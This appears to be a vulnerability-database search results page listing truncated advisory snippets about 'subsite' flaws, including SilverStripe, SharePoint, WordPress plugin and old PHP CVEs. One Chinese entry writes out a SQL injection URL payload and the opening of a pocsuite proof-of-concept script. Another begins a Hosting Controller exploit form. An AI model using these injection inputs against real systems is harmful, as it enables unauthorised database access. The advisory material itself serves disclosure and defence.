PT-2026-36572

Name of the Vulnerable Software and Affected Versions Import and export users and customers plugin for WordPress versions prior to 2.0.9 Description An issue exists in the save extra user profile fields function where an incomplete blocklist fails to restrict capability meta keys for subsites in ...

EUVD-2006-3103

Malware in sbrugna...

SilverStripe Subsite weakens file permissions

The subsites module can weaken edit restrictions on some files and allow a malicious user to edit files they do not have edit rights to. This only affects projects with the subsites module installed. Regression testing should focus on custom file logic. Be advised that this is not a case of a use...

GHSA-CX45-565Q-6QX8 SilverStripe Subsite weakens file permissions

The subsites module can weaken edit restrictions on some files and allow a malicious user to edit files they do not have edit rights to. This only affects projects with the subsites module installed. Regression testing should focus on custom file logic. Be advised that this is not a case of a use...

CVE-2022-42949 - Subsite weakens file permissions

More info at https://www.silverstripe.org/download/security-releases/cve-2022-42949...

Description of the security update for SharePoint Server Subscription Edition: April 12, 2022 (KB5002191)

Description of the security update for SharePoint Server Subscription Edition: April 12, 2022 KB5002191 Summary This security update resolves a Microsoft SharePoint Server spoofing vulnerability and Microsoft Excel remote code execution vulnerability. To learn more about the vulnerabilities, see...

Description of the security update for SharePoint Server 2019: April 12, 2022 (KB5002180)

Description of the security update for SharePoint Server 2019: April 12, 2022 KB5002180 Summary This security update resolves a Microsoft SharePoint Server spoofing vulnerability. To learn more about the vulnerability, see Microsoft Common Vulnerabilities and Exposures CVE-2022-24472. Note: To...

syba.sa XSS vulnerability

Open Bug Bounty ID: OBB-300271 Description| Value ---|--- Affected Website:| syba.sa Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

狼邦内容管理系统SQL注入漏洞 /bssh

狼邦内容管理系统，版本目前是V8.0，开发语言: ASP.NET 4.0，数据库: SQL2005， 运行环境: Windows2003/NT系统+IIS6.0 ，主要应用于贵州或其它地区的政府、学校、企事业单位、个人网站建设。/Webwsfw/bssh/?subsite=1%20and%201select%20@@version-- !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils...

CVE-2006-3106

Cross-site scripting XSS vulnerability in index.php in phpMyDesktop|Arcade 1.0 allows remote attackers to inject arbitrary web script or HTML via the subsite parameter in the subsite todo...

CVE-2006-2747

Directory traversal vulnerability in index.php in PhpMyDesktop|arcade 1.0 FINAL allows remote attackers to read arbitrary files or execute PHP code via a .. dot dot sequence and trailing null %00 byte in the subsite parameter in a showsubsite todo...

Hosting Controller 0.6.1 - User Registration (1)

Hosting Controller 0.6.1 - User Registration 1 Domain: Username: INPUT type="hidden" name="htype" value="27" id="htyp...